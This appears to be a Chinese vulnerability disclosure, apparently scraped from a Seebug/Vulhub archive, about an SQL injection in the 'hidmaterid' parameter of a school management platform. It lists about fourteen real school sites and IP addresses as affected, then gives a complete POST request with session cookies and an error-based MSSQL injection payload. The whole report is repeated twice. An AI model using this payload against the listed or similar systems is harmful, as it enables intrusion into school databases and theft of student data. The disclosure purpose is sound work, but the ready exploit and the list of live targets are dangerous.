VULHUB ™

### 简要描述： 某学生综合管理系统通用SQL注入漏洞 ### 详细说明： 系统名称：学校综合管理平台 厂商：上海安脉计算机科技有限公司 关键字：版权所有：上海安脉计算机科技有限公司 系统架构：ASPX+MSSQL 漏洞文件：ST_Manage/SystemManage/MaterialSetting.aspx 注入参数：hidmaterid 枚举部分案例： http://anmai.net:81/ http://jwxx.am.jsedu.sh.cn/ANMAI/ http://bssyxxgl.eicbs.com/ http://cjzx.am.jsedu.sh.cn/ http://glpt.nhshs.edu.sh.cn/ http://218.78.241.80/anmai/ http://www.aqyz.net/anmai/ http://218.22.96.74:8899/anmai/ http://120.69.153.68:8002/anmai654202_458357247/ http://222.82.229.202:2010/anmai/ http://58.118.20.5/anmai/ http://124.228.32.115:81/ http://luoxzx.am.jsedu.sh.cn/ http://www.syzxyz.com:8008/ 等等 漏洞验证： 官网为例： http://anmai.net:81/ST_Manage/SystemManage/MaterialSetting.aspx [<img src="https://images.seebug.org/upload/201503/191953043ccad830c9ddf26aa1dab1a0c795bb7b.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/191953043ccad830c9ddf26aa1dab1a0c795bb7b.png) ``` POST /ST_Manage/SystemManage/MaterialSetting.aspx HTTP/1.1 Host:...

### 简要描述： 某学生综合管理系统通用SQL注入漏洞 ### 详细说明： 系统名称：学校综合管理平台 厂商：上海安脉计算机科技有限公司 关键字：版权所有：上海安脉计算机科技有限公司 系统架构：ASPX+MSSQL 漏洞文件：ST_Manage/SystemManage/MaterialSetting.aspx 注入参数：hidmaterid 枚举部分案例： http://anmai.net:81/ http://jwxx.am.jsedu.sh.cn/ANMAI/ http://bssyxxgl.eicbs.com/ http://cjzx.am.jsedu.sh.cn/ http://glpt.nhshs.edu.sh.cn/ http://218.78.241.80/anmai/ http://www.aqyz.net/anmai/ http://218.22.96.74:8899/anmai/ http://120.69.153.68:8002/anmai654202_458357247/ http://222.82.229.202:2010/anmai/ http://58.118.20.5/anmai/ http://124.228.32.115:81/ http://luoxzx.am.jsedu.sh.cn/ http://www.syzxyz.com:8008/ 等等 漏洞验证： 官网为例： http://anmai.net:81/ST_Manage/SystemManage/MaterialSetting.aspx [<img src="https://images.seebug.org/upload/201503/191953043ccad830c9ddf26aa1dab1a0c795bb7b.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/191953043ccad830c9ddf26aa1dab1a0c795bb7b.png) ``` POST /ST_Manage/SystemManage/MaterialSetting.aspx HTTP/1.1 Host: anmai.net:81 Proxy-Connection: keep-alive Content-Length: 837 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://anmai.net:81 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://anmai.net:81/ST_Manage/SystemManage/MaterialSetting.aspx Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: %d2%ec%b6%af%c9%be%b3%fd%a1%a2%d0%de%b8%c4=%d2%ec%b6%af%c9%be%b3%fd%a1%a2%d0%de%b8%c4%7cSF_Manage%2findex.aspx%3ftype%3d4%26a%3d2; %cf%fb%b7%d1%bc%c7%c2%bc%d0%c5%cf%a2=%cf%fb%b7%d1%bc%c7%c2%bc%d0%c5%cf%a2%7cSF_Manage%2findex.aspx%3ftype%3d2%26a%3d5; %bc%f5%c3%e2%c8%cb%d4%b1%c1%d0%b1%ed=%bc%f5%c3%e2%c8%cb%d4%b1%c1%d0%b1%ed%7cSF_Manage%2findex.aspx%3ftype%3d3%26a%3d4; ASP.NET_SessionId=trqrt52wfcm2342nhvjzwx45; ASPSESSIONIDASDDACDA=ALJPFGODEGILBMFOALMMAPPC; %bd%cc%b2%c4%c9%e8%d6%c3=%bd%cc%b2%c4%c9%e8%d6%c3%7cST_Manage%2fSystemManage%2fSysDefault.aspx%3ftype%3d1 __VIEWSTATE=dDwxNDAxMjMzNjQ5O3Q8O2w8aTwxPjs%2BO2w8dDw7bDxpPDU%2BOz47bDx0PHA8bDxpbm5lcmh0bWw7PjtsPFw8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2NoazAnIHZhbHVlPScxMCdcPuWInemihOWkh%2BePrSZuYnNwXDtcPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGsxJyB2YWx1ZT0nMTEnXD7liJ3kuIDlubTnuqcmbmJzcFw7XDxpbnB1dCB0eXBlPSdjaGVja2JveCcgbmFtZT0nY2hrMicgdmFsdWU9JzEyJ1w%2B5Yid5LqM5bm057qnJm5ic3BcO1w8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2NoazMnIHZhbHVlPScxMydcPuWIneS4ieW5tOe6pyZuYnNwXDtcPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGs0JyB2YWx1ZT0nMTQnXD7pq5jkuIDlubTnuqcmbmJzcFw7XDxpbnB1dCB0eXBlPSdjaGVja2JveCcgbmFtZT0nY2hrNScgdmFsdWU9JzE1J1w%2B6auY5LqM5bm057qnJm5ic3BcO1w8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2NoazYnIHZhbHVlPScxNidcPumrmOS4ieW5tOe6pyZuYnNwXDs7Pj47Oz47Pj47Pj47Psrc5BRj5j0R9a%2F9WF0W0xI8wS2b&action1=doAdd&hidmaterid=&txtid=&txtjiaocainame=aaaa&chk1=11 ``` 漏洞验证： ``` Place: POST Parameter: hidmaterid Type: error-based Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause Payload: __VIEWSTATE=dDwxNDAxMjMzNjQ5O3Q8O2w8aTwxPjs O2w8dDw7bDxpPDU Oz47bDx 0PHA8bDxpbm5lcmh0bWw7PjtsPFw8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2NoazAnIHZhbHV lPScxMCdcPuWInemihOWkh ePrSZuYnNwXDtcPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGs xJyB2YWx1ZT0nMTEnXD7liJ3kuIDlubTnuqcmbmJzcFw7XDxpbnB1dCB0eXBlPSdjaGVja2JveCcgbmF tZT0nY2hrMicgdmFsdWU9JzEyJ1w 5Yid5LqM5bm057qnJm5ic3BcO1w8aW5wdXQgdHlwZT0nY2hlY2t ib3gnIG5hbWU9J2NoazMnIHZhbHVlPScxMydcPuWIneS4ieW5tOe6pyZuYnNwXDtcPGlucHV0IHR5cGU 9J2NoZWNrYm94JyBuYW1lPSdjaGs0JyB2YWx1ZT0nMTQnXD7pq5jkuIDlubTnuqcmbmJzcFw7XDxpbnB 1dCB0eXBlPSdjaGVja2JveCcgbmFtZT0nY2hrNScgdmFsdWU9JzE1J1w 6auY5LqM5bm057qnJm5ic3B cO1w8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2NoazYnIHZhbHVlPScxNidcPumrmOS4ieW5tOe 6pyZuYnNwXDs7Pj47Oz47Pj47Pj47Psrc5BRj5j0R9a/9WF0W0xI8wS2b&action1=doAdd&hidmater id=-2193' OR 2848=CONVERT(INT,(CHAR(58) CHAR(120) CHAR(122) CHAR(116) CHAR(58) ( SELECT (CASE WHEN (2848=2848) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(11 5) CHAR(122) CHAR(107) CHAR(58))) AND 'XCru'='XCru&txtid=&txtjiaocainame=aaaa&ch k1=11 --- ``` [<img src="https://images.seebug.org/upload/201503/19195439110206412e7247246c395fb13802a6cb.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/19195439110206412e7247246c395fb13802a6cb.png) 数据库： [<img src="https://images.seebug.org/upload/201503/1919544872b3b60d715e9601ebb3097941126e1e.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/1919544872b3b60d715e9601ebb3097941126e1e.png) ### 漏洞证明： 系统名称：学校综合管理平台 厂商：上海安脉计算机科技有限公司 关键字：版权所有：上海安脉计算机科技有限公司 系统架构：ASPX+MSSQL 漏洞文件：ST_Manage/SystemManage/MaterialSetting.aspx 注入参数：hidmaterid 枚举部分案例： http://anmai.net:81/ http://jwxx.am.jsedu.sh.cn/ANMAI/ http://bssyxxgl.eicbs.com/ http://cjzx.am.jsedu.sh.cn/ http://glpt.nhshs.edu.sh.cn/ http://218.78.241.80/anmai/ http://www.aqyz.net/anmai/ http://218.22.96.74:8899/anmai/ http://120.69.153.68:8002/anmai654202_458357247/ http://222.82.229.202:2010/anmai/ http://58.118.20.5/anmai/ http://124.228.32.115:81/ http://luoxzx.am.jsedu.sh.cn/ http://www.syzxyz.com:8008/ 等等 漏洞验证： 官网为例： http://anmai.net:81/ST_Manage/SystemManage/MaterialSetting.aspx [<img src="https://images.seebug.org/upload/201503/191953043ccad830c9ddf26aa1dab1a0c795bb7b.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/191953043ccad830c9ddf26aa1dab1a0c795bb7b.png) ``` POST /ST_Manage/SystemManage/MaterialSetting.aspx HTTP/1.1 Host: anmai.net:81 Proxy-Connection: keep-alive Content-Length: 837 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://anmai.net:81 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://anmai.net:81/ST_Manage/SystemManage/MaterialSetting.aspx Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: %d2%ec%b6%af%c9%be%b3%fd%a1%a2%d0%de%b8%c4=%d2%ec%b6%af%c9%be%b3%fd%a1%a2%d0%de%b8%c4%7cSF_Manage%2findex.aspx%3ftype%3d4%26a%3d2; %cf%fb%b7%d1%bc%c7%c2%bc%d0%c5%cf%a2=%cf%fb%b7%d1%bc%c7%c2%bc%d0%c5%cf%a2%7cSF_Manage%2findex.aspx%3ftype%3d2%26a%3d5; %bc%f5%c3%e2%c8%cb%d4%b1%c1%d0%b1%ed=%bc%f5%c3%e2%c8%cb%d4%b1%c1%d0%b1%ed%7cSF_Manage%2findex.aspx%3ftype%3d3%26a%3d4; ASP.NET_SessionId=trqrt52wfcm2342nhvjzwx45; ASPSESSIONIDASDDACDA=ALJPFGODEGILBMFOALMMAPPC; %bd%cc%b2%c4%c9%e8%d6%c3=%bd%cc%b2%c4%c9%e8%d6%c3%7cST_Manage%2fSystemManage%2fSysDefault.aspx%3ftype%3d1 __VIEWSTATE=dDwxNDAxMjMzNjQ5O3Q8O2w8aTwxPjs%2BO2w8dDw7bDxpPDU%2BOz47bDx0PHA8bDxpbm5lcmh0bWw7PjtsPFw8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2NoazAnIHZhbHVlPScxMCdcPuWInemihOWkh%2BePrSZuYnNwXDtcPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGsxJyB2YWx1ZT0nMTEnXD7liJ3kuIDlubTnuqcmbmJzcFw7XDxpbnB1dCB0eXBlPSdjaGVja2JveCcgbmFtZT0nY2hrMicgdmFsdWU9JzEyJ1w%2B5Yid5LqM5bm057qnJm5ic3BcO1w8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2NoazMnIHZhbHVlPScxMydcPuWIneS4ieW5tOe6pyZuYnNwXDtcPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGs0JyB2YWx1ZT0nMTQnXD7pq5jkuIDlubTnuqcmbmJzcFw7XDxpbnB1dCB0eXBlPSdjaGVja2JveCcgbmFtZT0nY2hrNScgdmFsdWU9JzE1J1w%2B6auY5LqM5bm057qnJm5ic3BcO1w8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2NoazYnIHZhbHVlPScxNidcPumrmOS4ieW5tOe6pyZuYnNwXDs7Pj47Oz47Pj47Pj47Psrc5BRj5j0R9a%2F9WF0W0xI8wS2b&action1=doAdd&hidmaterid=&txtid=&txtjiaocainame=aaaa&chk1=11 ``` 漏洞验证： ``` Place: POST Parameter: hidmaterid Type: error-based Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause Payload: __VIEWSTATE=dDwxNDAxMjMzNjQ5O3Q8O2w8aTwxPjs O2w8dDw7bDxpPDU Oz47bDx 0PHA8bDxpbm5lcmh0bWw7PjtsPFw8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2NoazAnIHZhbHV lPScxMCdcPuWInemihOWkh ePrSZuYnNwXDtcPGlucHV0IHR5cGU9J2NoZWNrYm94JyBuYW1lPSdjaGs xJyB2YWx1ZT0nMTEnXD7liJ3kuIDlubTnuqcmbmJzcFw7XDxpbnB1dCB0eXBlPSdjaGVja2JveCcgbmF tZT0nY2hrMicgdmFsdWU9JzEyJ1w 5Yid5LqM5bm057qnJm5ic3BcO1w8aW5wdXQgdHlwZT0nY2hlY2t ib3gnIG5hbWU9J2NoazMnIHZhbHVlPScxMydcPuWIneS4ieW5tOe6pyZuYnNwXDtcPGlucHV0IHR5cGU 9J2NoZWNrYm94JyBuYW1lPSdjaGs0JyB2YWx1ZT0nMTQnXD7pq5jkuIDlubTnuqcmbmJzcFw7XDxpbnB 1dCB0eXBlPSdjaGVja2JveCcgbmFtZT0nY2hrNScgdmFsdWU9JzE1J1w 6auY5LqM5bm057qnJm5ic3B cO1w8aW5wdXQgdHlwZT0nY2hlY2tib3gnIG5hbWU9J2NoazYnIHZhbHVlPScxNidcPumrmOS4ieW5tOe 6pyZuYnNwXDs7Pj47Oz47Pj47Pj47Psrc5BRj5j0R9a/9WF0W0xI8wS2b&action1=doAdd&hidmater id=-2193' OR 2848=CONVERT(INT,(CHAR(58) CHAR(120) CHAR(122) CHAR(116) CHAR(58) ( SELECT (CASE WHEN (2848=2848) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(11 5) CHAR(122) CHAR(107) CHAR(58))) AND 'XCru'='XCru&txtid=&txtjiaocainame=aaaa&ch k1=11 --- ``` [<img src="https://images.seebug.org/upload/201503/19195439110206412e7247246c395fb13802a6cb.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/19195439110206412e7247246c395fb13802a6cb.png) 数据库： [<img src="https://images.seebug.org/upload/201503/1919544872b3b60d715e9601ebb3097941126e1e.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/1919544872b3b60d715e9601ebb3097941126e1e.png)